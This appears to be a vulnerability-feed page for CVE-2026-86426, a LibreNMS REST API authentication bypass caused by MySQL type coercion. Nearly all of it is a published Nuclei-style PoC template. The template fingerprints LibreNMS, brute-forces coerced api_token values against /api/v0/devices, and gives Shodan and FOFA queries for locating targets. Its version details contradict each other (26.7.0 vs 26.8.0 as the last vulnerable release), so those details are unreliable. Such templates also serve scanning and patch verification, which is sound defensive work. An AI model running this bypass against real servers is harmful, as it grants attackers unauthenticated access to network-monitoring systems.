CVE-2026-86426: LibreNMS <= 26.7.0 - Unauthenticated API Access

日期: 2026-09-16 | 影响软件: 未知 | PoC: 已公开

漏洞描述

LibreNMS <= 26.8.0 contains an authentication bypass caused by MySQL type coercion in the REST API token validation, letting unauthenticated attackers access protected endpoints and execute remote code via alert templates.

PoC代码[已公开]

id: CVE-2026-86426

info:
  name: LibreNMS <= 26.7.0 - Unauthenticated API Access
  author: 0x_Akoko
  severity: critical
  description: |
    LibreNMS <= 26.8.0 contains an authentication bypass caused by MySQL type coercion in the REST API token validation, letting unauthenticated attackers access protected endpoints and execute remote code via alert templates.
  impact: |
    Unauthenticated attackers can access protected API endpoints and execute remote code, leading to full system compromise.
  remediation: |
    Update to version 26.8.0 or later.
  reference:
    - https://github.com/librenms/librenms/security/advisories/GHSA-cvq8-gqfq-3mvg
  classification:
    cvss-score: 9.2
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 11
    vendor: librenms
    product: librenms
    shodan-query: http.title:"LibreNMS"
    fofa-query: title="LibreNMS"
  tags: librenms,auth-bypass,type-confusion,api,unauth

flow: |
  if (http(1)) {
    var guesses = [[0], 1, 2, 3, 4, 5, 6, 7, 8, 9];
    for (var i = 0; i < guesses.length; i++) {
      set("guess", JSON.stringify(guesses[i]));
      if (http(2)) break;
    }
  }

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(tolower(body), "librenms")'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v0/devices HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"api_token":{{guess}}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "json")'
          - 'contains_all(body, "\"status\"", "\"ok\"", "\"devices\"")'
        condition: and
# digest: 4a0a00473045022029c1fd64a3c709c8f706a0055b32bdb0ce8e61e4b09bb8debfb7d8edeac0a25e022100e84ed6a48b9c364ac97bc1406d038d005b496afa275bc3a69b24ef8108ec2176:922c64590222798bb761d5b6d8e72950